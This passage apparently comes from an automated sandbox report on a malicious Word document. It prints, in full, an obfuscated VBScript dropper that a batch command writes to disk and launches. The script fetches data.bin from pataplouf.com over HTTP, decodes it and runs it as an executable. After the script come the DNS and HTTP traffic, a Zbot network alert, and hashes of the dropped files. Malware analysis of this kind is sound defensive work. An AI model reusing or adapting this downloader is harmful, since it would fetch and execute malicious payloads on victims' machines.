"XFY(5)=52" "WdL=65" "XFY(2)=107" "VGuQs=29" "XFY(3)=50" "Tx=74" "XFY(0)=104" "KcbM=14" "XFY(4)=54" "MHWU7=3" "XFY(1)=100" "T0nC=84" "BH=78" "SEt V70338G=crEateOBjEct(C5q("202C0126033B1A21146135261F2A2036003B16223C2D192A103B", "Os"))" "LzwWOCu=82" "sET NELKok=V70338G.GETfiLE(C5WeAKJ)" "RCkeymC=55" "SEt ARoLF=NELKok.opEnasTexTsTREAM(4099-4098,2858-2858)" "Kb=30" "SeT MquhqW4=V70338G.cREateTEXtFIlE(RhH,6169-6168,7237-7237)" "V4A6Wn=25" "dO UnTIL ARoLF.AteNDOfsTReAM" "MquhqW4.WRiTE Dpa6I(SIaQdx(Dtds6J(ARoLF.REad(4419-4418)),XFY(0)))" "lOop" "Mp5XgB=7" "MquhqW4.CLose" "SqpEda=57" "ARoLF.cLOSE" "N1oqA=11" "EnD funCtiOn" "sUB PeZxmzF(DFTbB)" "Crijd5W=95" "Dim FPiAJMz" "Db5=56" "RvE="LH03"" "Rv=10" "SEt FPiAJMz=CrEaTeOBJECt(C5q("09747C080A1E60383A555221",RvE))" "QGu4Xi6=54" "FPiAJMz.opEn" "UyYE=48" "FPiAJMz.TyPE=442-441" "XFV=49" "FPiAJMz.WrItE DFTbB" "IbEE=44" "FPiAJMz.SaveToFIlE MgWH & C5q("560D081E","CxaOstv"),9121-9119" "Ryh1i5=89" "FPiAJMz.clOse" "OtiDwT=13" "OYw5u" "QifCuY=58" "End sUB" "SUb OYw5u()" "L1=51" "TXsz2=""""" "D3W=52" "R1=MgWH & Ic2Og & C5q("782B6713","EVy3")" "BNUq=96" "JmlZ=C5q("3721316C313430627B0F7511000D0716746E776276","BTLU")" "QIk=85" "OCL8 MgWH & C5q("1A250D1D","Y4IJp"),R1" "Bf=82" "iF Ny="" THen KklN((915-911))" "L7nMFX=15" "YxV31="I1t"" "WOpbfK2=41" "sET MQY=crEatEoBjeCT(C5q("66272A431D39455A1A5911255D",YxV31))" "Odx=95" "MQY.rUn JmlZ & R1 & TXsz2,6397-6397,3340-3340" "BbDH=44" "eND SUb" "FUNctioN C5q(LKbD0x,QUhy5y)" "LZ=21" "diM S5OUdXn,GhI92m,QxE" "Yoo=87" "For S5OUdXn=1 To (leN(LKbD0x)/2)" "GhI92m=(Dpa6I((-3486+3524)) & Dpa6I((343080/4765))&(MId(LKbD0x,(S5OUdXn+S5OUdXn)-1,2)))" "QxE=(Dtds6J(miD(QUhy5y,((S5OUdXn MoD lEn(QUhy5y))+1),1)))" "C5q=C5q+Dpa6I(SIaQdx(GhI92m,QxE))" "NExt" "KPr=93" "enD fUncTION" "FUnCtion SIaQdx(UF,K4)" "ET=32" "SIaQdx=(UF ANd NOt K4)oR(nOt UF ANd K4)" "Y0=58" "eND FuncTion" "FuNcTion UfYR5N(IWBjR)" "OczshVC=94" "diM Td2,WLa3" "W8oj0Gh=31" "Bz8bR="VS7FS"" "RAg4nr9=86" "On eRror rESume NExt" "PZfR=17" "VnVHG="EJm7d"" "Vsz7=87" "SEt Td2=crEatEObject(C5q("1D3E54162C3A1919372D2F015B",VnVHG))" "Fxyv=65" "Y9iw="CxaOstv"" "SAja" "TS=33" "Set Iiu3v=Td2.ENVironmeNT(C5q("06302A0F030531","FVbeL"))" "X0i6mxo=33" "MgWH=Iiu3v(C5q("72126306721672","B3"))&Dpa6I((1402-1310))& Ic2Og & Ic2Og" "NBSa=47" "WzEa="WIgM"" "L9Pva=67" "SEt WLa3=crEaTeObjECT(C5q("040E2E25261422313D49151A052F190319",WzEa))" "OafZ=60" "WLa3.oPeN C5q("160A3D","XQOijh"),IWBjR,9170-9170" "QGh=16" "WLa3.SEnd()" "Of0e3V8=64" "if WLa3.sTatuS=(749-549) then" "T6Q1k=34" "SAja" "G39k=98" "KklN((12128/3032))" "SiyOlF=98" "PeZxmzF WLa3.RESpONsEBOdY" "PQrK=83" "Else" "DDAByn=88" "CD="DX04vuI"" "Lt6nMZT=66" "seT WLa3= cReATeoBjeCT(C5q("155957041A3A2B3E441A2E38050C0C6464",CD))" "Abin=76" "WLa3.OpeN C5q("721C07","K5YSx9"),C5q("04361832566D43705C7542775B6C546C5E775D6D082318234220052C","Bl" ),5086-5086" "Tqc3=18" "WLa3.sEnD()" "QG0L=8" "If WLa3.STatUS=(1358600/6793)thEn PeZxmzF WLa3.ReSPoNSEbody" "Ya7t=39" "Tce=77" "end if" "BpD7kX=24" "ENd fUnCTioN" "FUNctiON Dpa6I(UvJc)" "YQ9vMhv=34" "Dpa6I=chR(UvJc)" "ALhv=92" "eND FUNCtIon" "FUNCTIoN Ic2Og()" "RcI4YCd=23" "Ic2Og=SEcOND(tIME)" "Krqu5Bu=47" "eNd fUNction") do @echo %~i)>"!VFiOY!" && start "" "!VFiOY!"
(PID: 3408)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
pataplouf.com | 213.186.33.168 | - | France |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
213.186.33.168 |
80
TCP |
wscript.exe PID: 3196 |
France
ASN: 16276 (OVH SAS) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
213.186.33.168:80 (pataplouf.com) | GET | pataplouf.com/data.bin |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 213.186.33.168:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin | 2018052 |
Extracted Strings
Extracted Files
-
Informative 11
-
-
~WRS{970CBB03-0673-49D2-8698-D021578856D1}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
index.dat
- Size
- 540B (540 bytes)
- Type
- data
- MD5
- d7e2c45bf740a2c680a1ad6f0e4bdc7e
- SHA1
- e8c9299607a62736e2258f1f8382fa59c0364ab2
- SHA256
- a21d2089d291358538eddeb7541fe5046f2649678d84db70c889bedb5378e77f
-
data[1].bin
- Size
- 373KiB (381571 bytes)
- Type
- data
- MD5
- 3f9ad3c1ad05533cbdc9f050d73dcf1b
- SHA1
- 0b8b91665ec4378269f1e6c6cfe2f65450a2bb71
- SHA256
- 685ac950f5720f574f608c74cf1a9d937db05a0245dec85c419d5e35088b0df0
-
ExcludeDictionaryEN0409.lex
- Size
- 2B (2 bytes)
- Type
- Little-endian UTF-16 Unicode text, with no line terminators
- MD5
- f3b25701fe362ec84616a93a45ce9998
- SHA1
- d62636d8caec13f04e28442a0a6fa1afeb024bbb
- SHA256
- b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
-
00.lGm
- Size
- 373KiB (381571 bytes)
- Type
- data
- MD5
- 3f9ad3c1ad05533cbdc9f050d73dcf1b
- SHA1
- 0b8b91665ec4378269f1e6c6cfe2f65450a2bb71
- SHA256
- 685ac950f5720f574f608c74cf1a9d937db05a0245dec85c419d5e35088b0df0
-
000.RTV
- Size
- 54KiB (55611 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- MD5
- 733870688ffc79cafbd00b0a7f2bcdfd
- SHA1
- 624a240b5f3bc660fc7bf14b306553deb8b23c83
- SHA256
- a67a319f8f08e794adb89a5bad4d5037abf51e0bbea71c4e69c4a46b6d4cbe18
-
801ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Mon Aug 8 13:50:22 2016, mtime=Mon Aug 8 13:50:22 2016, atime=Mon Aug 8 22:49:26 2016, length=228864, window=hide
- MD5
- 63ddc240faaceb94aecf967126d6d4fd
- SHA1
- 3b3d88d7014749f2a53a82e841649feb1f0bf1a1
- SHA256
- 5da8138189b73df76b5c2269a26ddb42da33070c542d8cfce3c0fde37ab3fd33
-
~$1ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 21e713fa03e4604554006c6228349162
- SHA1
- 5aa472878b4dfdb66bddaa96eb30bcd0c4d890c7
- SHA256
- a3e6f1edd1219b726d0c899e7883f7580ac525b41eb1121df02cab2302613b3c
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 21e713fa03e4604554006c6228349162
- SHA1
- 5aa472878b4dfdb66bddaa96eb30bcd0c4d890c7
- SHA256
- a3e6f1edd1219b726d0c899e7883f7580ac525b41eb1121df02cab2302613b3c
-
1948.vbs
- Size
- 3.7KiB (3803 bytes)
- Type
- ASCII text, with CRLF line terminators
- MD5
- c4d732f3b9df5db32705dc8179562a67
- SHA1
- a04235f7f2bf1c446969a5726ee7f9f46f0c869a
- SHA256
- 99a9f12dff907e90eb9e2b77dcdc0d0ce09cafe912abbce6d9be3a96f078a01f
-
~WRS{8D607A42-AAF5-4B6F-895A-2422510A9C4F}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- f1d3656dae9e9b6d19a21086a76d758c
- SHA1
- 55443d3cb79a24f5b341c0f107fff772edaadc15
- SHA256
- f5ff55c843a45d305ded6794a6f81383594deba6ec94a0481005bec75f7e959d
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Dropped file "000.RTV" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/a67a319f8f08e794adb89a5bad4d5037abf51e0bbea71c4e69c4a46b6d4cbe18/analysis/1470664757/")
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report